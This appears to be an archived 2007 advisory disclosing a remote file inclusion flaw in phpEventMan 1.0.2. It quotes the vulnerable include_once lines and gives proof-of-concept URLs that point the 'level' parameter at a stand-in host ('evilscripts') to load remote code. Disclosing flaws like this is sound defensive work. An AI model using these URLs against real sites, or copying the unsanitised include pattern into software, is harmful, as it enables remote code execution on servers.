Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

SIPS <= 0.3.1(box.inc. php) Remote File Include Vulnerability

Cerulean Portal System (phpbb_root_path) Remote File Include Exploit

Omegaboard v1.0b4 (phpbb_root_path) Remote File Include Exploit

Hailboards v1.2.0 (phpbb_root_path) Remote File Include Exploit

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	01.02.2007
Subject:	phpEventMan v1.0.2 (level) Remote File Include Exploit

-----------------------------------------------

phpEventMan v1.0.2 (level) Remote File Include Exploit

-----------------------------------------------

Author: Cyber-Security

cyber-security.org

-----------------------------------------------

Code:

include_once($level."UserMan/controller/common.function.
php");
include_once($level."Shared/sharedfunctions.php");

-----------------------------------------------

POC:

www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http:
//evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http:
//evilscripts ?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=169887
-----------------------------------------------

Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594